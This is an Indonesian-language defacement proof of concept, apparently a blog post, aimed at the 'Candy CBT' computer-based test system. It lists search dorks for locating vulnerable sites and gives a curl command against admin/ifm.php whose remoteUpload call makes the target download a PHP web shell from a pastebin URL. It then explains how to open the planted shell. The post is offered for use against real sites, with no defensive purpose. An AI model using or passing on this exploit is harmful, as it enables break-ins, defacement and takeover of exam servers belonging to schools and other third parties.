Deface Poc Computer Based Test RCE
Dork:
"Support By Candy CBT"
"Support By Candy CBT"+"Login"
"Candy CBT"+"Login"
(Kembangin lagi gann...)
# Exploit #
-admin/ifm.php
jika saat di masukan Exploit nya malah redirect ke halaman admin/login.php
Maka itu tandanya vuln.
# Kode Rce #
curl http://targetkalian.com/admin/ifm.php -d 'api=remoteUpload&dir=&filename=D.php&method=curl&url=https://pastebin.com/raw/Vsaj9aS3'
# Kode Rce #
curl http://targetkalian.com/admin/ifm.php -d 'api=remoteUpload&dir=&filename=D.php&method=curl&url=https://pastebin.com/raw/Vsaj9aS3'
Nama shell nya D.php bsa lu ganti sesuka hati lo
Akses Shell?
http://linktarget.com/files/namashell.php
Akses Shell?
http://linktarget.com/files/namashell.php
contact : ncdream72@gmail.com
EmoticonEmoticon